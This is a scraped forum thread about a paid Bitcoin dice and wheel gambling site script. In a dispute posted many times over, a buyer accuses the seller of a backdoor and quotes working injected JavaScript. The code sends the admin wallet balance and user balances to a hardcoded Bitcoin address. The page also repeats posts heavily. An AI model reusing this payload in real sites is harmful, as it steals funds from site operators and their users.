HrN, send me the code for me to check. My PHP skills are a bit rusty, but might at least help clarify some things.
Also, race attacks are TRIVIAL, there was a problem with mpos and a lot of pools had their bitcoins stolen this way.
Topic: Start your own gambling site! - CoinWheel 1.0 script [1 BTC] - page 2. (Read 37019 times)
legendary
Activity: 1862
Merit: 1011
Reverse engineer from time to time
SCAMMER!
He stollen from me 1.6 btc.
SCAMMER! DON'T TRUST HIM. DON'T BUY FROM HIM. HE WILL STEAL ALL BITCOINS FROM YOU!
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227
He have backdoreed script:
_________________________
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);
He stollen from me 1.6 btc.
SCAMMER! DON'T TRUST HIM. DON'T BUY FROM HIM. HE WILL STEAL ALL BITCOINS FROM YOU!
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227
He have backdoreed script:
_________________________
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);
This is not my backdoor. You can check the original files that we have sent you. There's no such thing.
You just let someone to put the backdoor in your site, don't blame me from that.
This code was injected with XSS in the database! You leaved this vulnerability to stole all bitcoins.
REFUND ME!
Firts of all you mean sql injection and XSS wasn't put in by such vulnerability because there isn't such. You simply haven't been careful enough and you haven't updated the script! You've got version 1.2 even if we are offering new version for free!
I have not received the update.
I lost 18 btc when AUTOBET was vulnerable, but the vulnerability was resolved by me; then someone has injected a malware code in my database.
YOU SOLD ME A VULNERABLE SCRIPT!
Because you did not request it.
You mean martingale?
Could you please show me where the vulnerability is, if you're so smart? And the answer is nowhere. You just were not careful, sorry.
HERE IS THE VULNERABILITY ON AUTOBET:
https://i.imgur.com/zPrPXcX.jpg
Difference betwen slower and faster is so tiny that it can't do what you've described. It exist only theoretically, not practically.
SCAMMER!
He stollen from me 1.6 btc.
SCAMMER! DON'T TRUST HIM. DON'T BUY FROM HIM. HE WILL STEAL ALL BITCOINS FROM YOU!
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227
He have backdoreed script:
_________________________
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);
He stollen from me 1.6 btc.
SCAMMER! DON'T TRUST HIM. DON'T BUY FROM HIM. HE WILL STEAL ALL BITCOINS FROM YOU!
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227
He have backdoreed script:
_________________________
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);
This is not my backdoor. You can check the original files that we have sent you. There's no such thing.
You just let someone to put the backdoor in your site, don't blame me from that.
This code was injected with XSS in the database! You leaved this vulnerability to stole all bitcoins.
REFUND ME!
Firts of all you mean sql injection and XSS wasn't put in by such vulnerability because there isn't such. You simply haven't been careful enough and you haven't updated the script! You've got version 1.2 even if we are offering new version for free!
I have not received the update.
I lost 18 btc when AUTOBET was vulnerable, but the vulnerability was resolved by me; then someone has injected a malware code in my database.
YOU SOLD ME A VULNERABLE SCRIPT!
Because you did not request it.
You mean martingale?
Could you please show me where the vulnerability is, if you're so smart? And the answer is nowhere. You just were not careful, sorry.
HERE IS THE VULNERABILITY ON AUTOBET:
https://i.imgur.com/zPrPXcX.jpg
SCAMMER!
He stollen from me 1.6 btc.
SCAMMER! DON'T TRUST HIM. DON'T BUY FROM HIM. HE WILL STEAL ALL BITCOINS FROM YOU!
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227
He have backdoreed script:
_________________________
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);
He stollen from me 1.6 btc.
SCAMMER! DON'T TRUST HIM. DON'T BUY FROM HIM. HE WILL STEAL ALL BITCOINS FROM YOU!
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227
He have backdoreed script:
_________________________
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);
This is not my backdoor. You can check the original files that we have sent you. There's no such thing.
You just let someone to put the backdoor in your site, don't blame me from that.
This code was injected with XSS in the database! You leaved this vulnerability to stole all bitcoins.
REFUND ME!
Firts of all you mean sql injection and XSS wasn't put in by such vulnerability because there isn't such. You simply haven't been careful enough and you haven't updated the script! You've got version 1.2 even if we are offering new version for free!
I have not received the update.
I lost 18 btc when AUTOBET was vulnerable, but the vulnerability was resolved by me; then someone has injected a malware code in my database.
YOU SOLD ME A VULNERABLE SCRIPT!
Because you did not request it.
You mean martingale?
Could you please show me where the vulnerability is, if you're so smart? And the answer is nowhere. You just were not careful, sorry.
SCAMMER!
He stollen from me 1.6 btc.
SCAMMER! DON'T TRUST HIM. DON'T BUY FROM HIM. HE WILL STEAL ALL BITCOINS FROM YOU!
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227
He have backdoreed script:
_________________________
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);
He stollen from me 1.6 btc.
SCAMMER! DON'T TRUST HIM. DON'T BUY FROM HIM. HE WILL STEAL ALL BITCOINS FROM YOU!
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227
He have backdoreed script:
_________________________
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);
This is not my backdoor. You can check the original files that we have sent you. There's no such thing.
You just let someone to put the backdoor in your site, don't blame me from that.
This code was injected with XSS in the database! You leaved this vulnerability to stole all bitcoins.
REFUND ME!
Firts of all you mean sql injection and XSS wasn't put in by such vulnerability because there isn't such. You simply haven't been careful enough and you haven't updated the script! You've got version 1.2 even if we are offering new version for free!
SCAMMER!
He stollen from me 1.6 btc.
SCAMMER! DON'T TRUST HIM. DON'T BUY FROM HIM. HE WILL STEAL ALL BITCOINS FROM YOU!
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227
He have backdoreed script:
_________________________
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);
He stollen from me 1.6 btc.
SCAMMER! DON'T TRUST HIM. DON'T BUY FROM HIM. HE WILL STEAL ALL BITCOINS FROM YOU!
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227
He have backdoreed script:
_________________________
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);
This is not my backdoor. You can check the original files that we have sent you. There's no such thing.
You just let someone to put the backdoor in your site, don't blame me from that.
Hi,
This is very interesting.
1) Can you also make this multilingual? So that the interface can be changed from English to Chinese and Russian and any other languages, through GUI or customizable .po files
2) Can it be installed on a shared hosting? Or do you need access to the root and shell?
3) Can the buyer (who has a server or shared hosting, but is not very technical) expect assistance from you in installing this? Can you help install the wallet and this script during a Skype conference? Or is it like "pay 1 BTC, get the script and you're on your own"?
4) Can the house advantage be easily altered (say from 1.5% to 2%) without breaking the whole site? or is it forever fixed at 1.5%?
PS: Apart from Dice and Wheel, it would be cool to have a Roulette and Black Jack
This is very interesting.
1) Can you also make this multilingual? So that the interface can be changed from English to Chinese and Russian and any other languages, through GUI or customizable .po files
2) Can it be installed on a shared hosting? Or do you need access to the root and shell?
3) Can the buyer (who has a server or shared hosting, but is not very technical) expect assistance from you in installing this? Can you help install the wallet and this script during a Skype conference? Or is it like "pay 1 BTC, get the script and you're on your own"?
4) Can the house advantage be easily altered (say from 1.5% to 2%) without breaking the whole site? or is it forever fixed at 1.5%?
PS: Apart from Dice and Wheel, it would be cool to have a Roulette and Black Jack
Hi,
1, We don't have time for custom works but you can definitally hire somebody to do that but english is hardcoded. However as you can see there is not much of the text so it shouldn't be problem to add it there.
2, You need VPS because of bitcoin or altcoin wallet.
3, Sure, you'll get support.
4, On CoinDice you can change the house edge in administration but on CoinWheel you would have to change whole wheel. There is 16 options which can occur. If you sum every area you'll get 15.75 so 0.25 is for casino. That's how house edge is calculated. On CoinDice it workd differently and it can be change easily.
Thank for tips for another games! I hope some people will support us with existing ones so we can develop more of them.
Hi,
This is very interesting.
1) Can you also make this multilingual? So that the interface can be changed from English to Chinese and Russian and any other languages, through GUI or customizable .po files
2) Can it be installed on a shared hosting? Or do you need access to the root and shell?
3) Can the buyer (who has a server or shared hosting, but is not very technical) expect assistance from you in installing this? Can you help install the wallet and this script during a Skype conference? Or is it like "pay 1 BTC, get the script and you're on your own"?
4) Can the house advantage be easily altered (say from 1.5% to 2%) without breaking the whole site? or is it forever fixed at 1.5%?
PS: Apart from Dice and Wheel, it would be cool to have a Roulette and Black Jack
This is very interesting.
1) Can you also make this multilingual? So that the interface can be changed from English to Chinese and Russian and any other languages, through GUI or customizable .po files
2) Can it be installed on a shared hosting? Or do you need access to the root and shell?
3) Can the buyer (who has a server or shared hosting, but is not very technical) expect assistance from you in installing this? Can you help install the wallet and this script during a Skype conference? Or is it like "pay 1 BTC, get the script and you're on your own"?
4) Can the house advantage be easily altered (say from 1.5% to 2%) without breaking the whole site? or is it forever fixed at 1.5%?
PS: Apart from Dice and Wheel, it would be cool to have a Roulette and Black Jack
February 24, 2014, 11:37:34 AM
Selling this for 0.6 , will accept escrow, PM me.
scammer.
This is copyrighted content. Stop sharing it illegaly.
February 24, 2014, 11:36:14 AM
Selling this for 0.6 , will accept escrow, PM me.
February 23, 2014, 11:11:10 AM
Hello,
I'd like to sell this for a friend, as he would pay you 1.1BTC and I will be getting 0.15BTC. I offered him that already and he want to buy it, however, I just noticed that more than just a regular hosting is required. People replied here something about VPS, and I didn't really understand what are the requirements.
So I would like to ask, is there anything else required for the dice thing except for the script and regular hosting?
And hows the deposit work, I mean there's one BTC account, how everyone gets deposit unique addresses?
I'd like to sell this for a friend, as he would pay you 1.1BTC and I will be getting 0.15BTC. I offered him that already and he want to buy it, however, I just noticed that more than just a regular hosting is required. People replied here something about VPS, and I didn't really understand what are the requirements.
So I would like to ask, is there anything else required for the dice thing except for the script and regular hosting?
And hows the deposit work, I mean there's one BTC account, how everyone gets deposit unique addresses?
February 17, 2014, 02:57:51 PM
February 17, 2014, 02:35:26 PM
did you receive my email?
February 17, 2014, 01:47:59 PM
It is not letting me pm It keeps giving me some ip error message. Could you please email me at [email protected] or skype ddaniels518. I am a serious buyer and ready to make a deal right now.
Ok, email sent.
February 17, 2014, 01:06:02 PM
It is not letting me pm It keeps giving me some ip error message. Could you please email me at [email protected] or skype ddaniels518. I am a serious buyer and ready to make a deal right now.
February 17, 2014, 01:02:24 PM
could you please email me as anything i try to do on here gives me a error message. takes me 100 tries to make a reply [email protected]
Don't contact imrer, his account has a BAN, write me a PM please.
February 17, 2014, 12:53:03 PM
could you please email me as anything i try to do on here gives me a error message. takes me 100 tries to make a reply [email protected]
still for sale?
One of my client request a betting site. It's fine to find you here. I have one question to you: is there any documentation for installing it? thanks
HOW-TO file is included at installation package.
Jump to: